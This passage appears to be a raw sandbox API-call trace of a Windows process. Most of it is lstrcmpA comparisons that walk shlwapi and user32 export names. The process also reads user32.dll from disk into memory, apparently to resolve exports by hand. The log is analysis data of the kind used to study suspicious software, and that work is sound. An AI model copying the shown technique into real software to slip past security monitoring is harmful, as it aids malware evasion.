(lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0241.739] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0241.739] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0241.739] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0241.739] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0241.739] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0241.739] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0241.739] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0241.739] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0241.739] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0241.739] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0241.739] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0241.739] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0241.739] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0241.740] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0241.740] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0241.740] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0241.740] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0241.740] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0241.740] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0241.740] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0241.740] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0241.741] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0241.741] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0241.741] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0241.741] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0241.741] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0241.741] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0241.741] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0241.742] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0241.742] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0241.742] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0241.742] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0241.742] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0241.742] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0241.742] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0241.742] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0241.742] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0241.742] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0241.742] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0241.742] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0241.756] GetProcessHeap () returned 0x550000 [0241.757] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d65030 | out: hHeap=0x550000) returned 1 [0241.757] GetProcessHeap () returned 0x550000 [0241.757] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x569130 [0241.757] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0241.757] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0241.757] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0241.758] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0241.758] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0241.759] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0241.759] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0241.759] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0241.759] GetProcessHeap () returned 0x550000 [0241.759] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1555b8) returned 0x412e040 [0241.763] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0241.763] ReadFile (in: hFile=0x17c, lpBuffer=0x412e040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x412e040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0242.011] CloseHandle (hObject=0x17c) returned 1 [0242.011] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0242.011] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0242.011] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0242.011] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0242.011] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0242.011] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0242.011] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0242.011] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0242.011] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0242.011] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0242.011] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0242.012] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0242.012] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0242.012] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0242.012] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0242.012] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0242.012] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0242.012] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0242.012] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0242.012] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0242.012] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0242.012] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0242.012] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0242.012] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0242.012] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0242.012] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0242.012] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0242.012] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0242.012] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0242.012] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0242.013] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0242.013] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0242.013] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0242.013] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0242.013] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0242.013] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0242.013] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0242.013] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0242.013] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0242.013] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0242.013] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0242.013] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0242.013] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0242.013] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0242.013] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0242.013] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0242.013] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0242.013] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0242.013] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0242.013] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0242.013] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0242.013] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0242.013] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0242.014] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0242.014] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0242.014] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0242.014] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0242.014] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0242.014] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0242.014] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0242.014] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0242.014] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0242.014] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0242.014] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0242.014] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0242.014] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0242.014] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0242.014] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0242.014] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0242.014] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0242.014] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0242.014] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0242.014] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0242.014] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0242.014] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0242.015] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0242.015] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0242.015] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0242.015] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0242.015] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0242.015] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0242.015] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0242.015] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0242.015] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0242.015] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0242.015] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0242.015] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0242.015] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0242.015] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0242.015] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0242.015] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0242.015] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0242.015] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0242.015] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0242.015] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0242.015] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0242.016] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0242.016] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0242.016] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0242.016] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0242.016] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0242.016] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0242.016] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0242.016] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0242.016] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0242.016] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0242.016] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0242.016] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0242.016] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0242.016] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0242.016] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0242.016] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0242.017] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0242.017] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0242.017] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0242.017] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0242.017] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0242.017] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0242.017] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0242.017] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0242.017] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0242.017] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0242.017] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0242.018] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0242.019] 